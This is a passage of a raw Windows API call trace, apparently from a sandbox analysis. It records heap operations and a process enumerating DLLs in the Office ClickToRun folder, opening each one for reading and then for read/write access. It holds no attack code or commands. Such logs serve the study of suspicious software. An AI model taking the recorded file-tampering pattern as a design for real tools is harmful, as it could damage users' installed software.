(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0074.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0074.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0074.510] AreFileApisANSI () returned 1 [0074.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x5a6b8 [0074.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 94 [0074.510] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x68c0)) returned 1 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.510] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-private-l1-1-0.dll", cAlternateFileName="AP7D9E~1.DLL")) returned 1 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0074.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0074.511] AreFileApisANSI () returned 1 [0074.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0074.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.512] AreFileApisANSI () returned 1 [0074.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 92 [0074.512] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.512] GetFileType (hFile=0x42c) returned 0x1 [0074.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.512] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.512] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.512] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.513] CloseHandle (hObject=0x42c) returned 1 [0074.513] AreFileApisANSI () returned 1 [0074.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 92 [0074.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.513] GetFileType (hFile=0x42c) returned 0x1 [0074.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.513] CloseHandle (hObject=0x42c) returned 1 [0074.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0074.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0074.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0074.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0074.515] AreFileApisANSI () returned 1 [0074.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 92 [0074.515] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x114c0)) returned 1 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0074.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.515] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-process-l1-1-0.dll", cAlternateFileName="APFCAD~1.DLL")) returned 1 [0074.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0074.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0074.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0074.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0074.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0074.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0074.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0074.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0074.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0074.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0074.516] 